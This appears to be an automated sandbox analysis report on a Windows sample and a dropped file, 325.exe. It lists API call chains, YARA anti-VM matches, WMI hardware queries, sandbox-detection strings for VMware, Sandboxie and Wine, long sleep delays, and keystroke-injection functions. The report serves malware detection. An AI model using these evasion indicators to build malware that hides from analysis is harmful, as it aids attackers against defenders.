Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014008B280 GetWindowThreadProcessId,GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,BringWindowToTop,	0_2_000000014008B280
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014005E330 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,CreateDCW,GetDC,GetPixel,DeleteDC,ReleaseDC,	0_2_000000014005E330
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140075850 SetDlgItemTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus,	0_2_0000000140075850
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140075850 SetDlgItemTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,GetWindowRect,GetWindowLongW,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongW,GetWindowLongW,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus,	0_2_0000000140075850
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140044A00 IsDlgButtonChecked,IsWindowVisible,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,IsDlgButtonChecked,	0_2_0000000140044A00
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140071A10 GetWindowLongW,GetWindowLongW,SetWindowPos,EnableWindow,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,IsWindow,SetParent,SetWindowLongPtrW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect,	0_2_0000000140071A10
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400C2BE0 IsIconic,	0_2_00000001400C2BE0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140040D29 IsZoomed,IsIconic,	0_2_0000000140040D29
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140079D90 IsDlgButtonChecked,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,IsDlgButtonChecked,GetWindowLongW,ShowWindow,EnableWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,SetFocus,IsDlgButtonChecked,SetFocus,MapWindowPoints,InvalidateRect,	0_2_0000000140079D90

Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 325.exe PID: 4796, type: MEMORY

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Roaming\325.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Roaming\325.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\AppData\Roaming\325.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\AppData\Roaming\325.exe	Window / User API: threadDelayed 440			Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Window / User API: threadDelayed 7193			Jump to behavior

Source: C:\Users\user\AppData\Roaming\325.exe

Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\AppData\Roaming\325.exe TID: 3868	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe TID: 5044	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe TID: 5644	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe TID: 3348	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\325.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140013FF0 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jl 0000000140014030h country: Spanish (es)	0_2_0000000140013FF0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140014380 GetKeyboardLayout followed by cmp: cmp dl, 00000019h and CTI: ja 00000001400144F3h country: Russian (ru)	0_2_0000000140014380
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400055F0 GetKeyboardLayout followed by cmp: cmp ebx, 0ah and CTI: jl 0000000140005720h country: Spanish (es)	0_2_00000001400055F0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014000DAA0 GetKeyboardLayout followed by cmp: cmp word ptr [r14+02h], bp and CTI: jne 000000014000DBAAh	0_2_000000014000DAA0

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140045CF0 GetLocalTime followed by cmp: cmp word ptr [rbx], ax and CTI: je 0000000140046041h		0_2_0000000140045CF0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140045CF0 GetLocalTime followed by cmp: cmp dx, ax and CTI: je 0000000140045F13h		0_2_0000000140045CF0

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140087A90 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0000000140087A90
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140087B90 FindFirstFileW,FindClose,FindFirstFileW,FindClose,	0_2_0000000140087B90
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D080 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D080
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140062320 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0000000140062320
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400C2390 FindFirstFileW,	0_2_00000001400C2390
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D405 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D405
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D40F SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D40F
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D419 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D419
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D423 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D423
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D44D SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D44D
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D478 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D478
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D4A0 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D4A0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D4BE SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D4BE
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D4DF SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D4DF
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D500 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D500
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D792 FindFirstFileW,GetLastError,	0_2_000000014004D792
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D7E0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,	0_2_000000014004D7E0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D990 SystemTimeToFileTime,LocalFileTimeToFileTime,GetLastError,GetSystemTimeAsFileTime,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,CreateFileW,GetLastError,SetFileTime,GetLastError,CloseHandle,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D990
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140061A30 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,CopyFileW,GetLastError,FindNextFileW,FindClose,	0_2_0000000140061A30
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004CAE0 SetLastError,DeleteFileW,GetLastError,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,DeleteFileW,GetLastError,FindNextFileW,FindClose,	0_2_000000014004CAE0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140032DC0 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,	0_2_0000000140032DC0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004DFA0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,	0_2_000000014004DFA0

Source: C:\Users\user\AppData\Roaming\325.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\325.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: kS2dqbsDwD.exe	Binary or memory string: Hyper-V RAW
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: 325.exe, 00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: 325.exe, 0000000E.00000002.362868644.0000000000EAF000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Roaming\325.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Code function: 0_2_00000001400B12B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00000001400B12B0

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

0_2_0000000140060290

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Code function: 0_2_00000001400C2648 GetStringTypeW,GetProcessHeap,IsValidCodePage,

0_2_00000001400C2648

Source: C:\Users\user\AppData\Roaming\325.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400BC054 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00000001400BC054
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400B12B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00000001400B12B0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400C24B8 SetUnhandledExceptionFilter,	0_2_00000001400C24B8

Source: C:\Users\user\AppData\Roaming\325.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

0_2_0000000140036D50

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Code function: 0_2_0000000140010F60 GetCurrentThreadId,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetAsyncKeyState,keybd_event,GetAsyncKeyState,keybd_event,GetAsyncKeyState,

0_2_0000000140010F60

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Code function: 0_2_0000000140062600 mouse_event,

0_2_0000000140062600

Source: C:\Users\user\AppData\Roaming\325.exe

Process created: C:\Users\user\AppData\Roaming\325.exe {path}

Jump to behavior

Source: kS2dqbsDwD.exe	Binary or memory string: Program Manager
Source: kS2dqbsDwD.exe	Binary or memory string: Shell_TrayWnd
Source: kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp	Binary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidgroupclass%s%uProgram ManagerError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory"
Source: kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp	Binary or memory string: regk-hookm-hook2-hooksjoypollPART%i-%i(no)%s%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%u...%s[%Iu of %Iu]: 